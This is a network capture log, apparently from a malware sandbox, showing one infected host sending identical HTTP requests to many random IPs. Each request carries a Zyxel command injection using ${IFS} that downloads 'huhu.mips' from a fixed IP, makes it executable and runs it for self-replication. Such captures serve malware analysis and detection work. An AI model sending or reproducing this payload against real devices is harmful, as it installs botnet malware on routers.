                                                Jan 29, 2024 07:07:54.474399090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5958192.168.2.23333709.82.20.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474430084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5959192.168.2.233897281.197.210.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474457026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5960192.168.2.233526259.33.162.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474524975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5961192.168.2.2349244206.170.182.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474576950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5962192.168.2.2355328169.123.202.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474627972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5963192.168.2.235809676.128.236.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474668026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5964192.168.2.235137437.186.215.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474715948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5965192.168.2.2350404109.85.217.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474745035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5966192.168.2.2345970170.181.150.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474792957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5967192.168.2.2356312197.72.126.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474807978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5968192.168.2.2355120145.27.247.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474829912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5969192.168.2.2348984216.180.251.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474872112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5970192.168.2.2351746172.91.187.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474936962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5971192.168.2.2344310192.114.20.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.474991083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5972192.168.2.2336662203.5.187.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475028038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5973192.168.2.2354584184.177.147.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475061893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5974192.168.2.2341138196.142.195.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475085974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5975192.168.2.2350570137.16.7.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475116968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5976192.168.2.2345122103.223.168.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475155115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5977192.168.2.2351242181.203.236.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475203037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5978192.168.2.2348442129.230.37.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475228071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5979192.168.2.2334954172.218.36.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475271940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5980192.168.2.2341496116.145.63.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475286961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5981192.168.2.2346566175.59.45.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475302935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5982192.168.2.2347390134.110.237.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475338936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5983192.168.2.2339918144.122.190.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475385904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5984192.168.2.2347638180.0.73.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475404978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5985192.168.2.2343092122.185.43.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475439072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5986192.168.2.233451843.254.46.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475505114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5987192.168.2.2353814101.55.161.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475533962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5988192.168.2.2349538173.251.222.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475570917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5989192.168.2.2355388139.152.231.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475615978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5990192.168.2.233525087.2.193.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475661993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5991192.168.2.2343750143.44.37.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475711107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5992192.168.2.234657441.165.157.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475745916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5993192.168.2.233644850.111.40.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475759983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5994192.168.2.2349058195.34.119.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475795031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5995192.168.2.2345604111.13.251.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475857019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5996192.168.2.233619445.57.69.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475881100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5997192.168.2.2337218157.115.224.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475929022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5998192.168.2.2342126175.126.191.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.475958109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5999192.168.2.234241254.248.62.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476011992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6000192.168.2.235390631.70.242.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476062059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6001192.168.2.2350954178.143.36.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476100922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6002192.168.2.2360138170.38.77.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476159096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6003192.168.2.235699652.111.222.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476166010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6004192.168.2.234427066.77.77.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476208925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6005192.168.2.2347896147.171.215.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476217985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6006192.168.2.2353808208.233.40.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476253033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6007192.168.2.23581802.188.29.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476285934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6008192.168.2.2349598221.212.76.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476305008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6009192.168.2.2344938206.7.190.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476363897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6010192.168.2.2355306178.21.181.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476397991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6011192.168.2.235283836.17.33.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476435900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6012192.168.2.2343530182.132.18.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476476908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6013192.168.2.2341588106.149.75.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476491928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6014192.168.2.2335828164.189.147.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476547956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6015192.168.2.233478461.100.186.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476577997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6016192.168.2.2343778216.88.30.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476612091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6017192.168.2.23459641.24.163.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476665974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6018192.168.2.235677831.21.13.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476701021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6019192.168.2.2338168188.141.222.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476701975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6020192.168.2.235690889.73.157.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:54.476797104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6021192.168.2.233597094.205.249.18443
                                                TimestampBytes transferredDirectionData
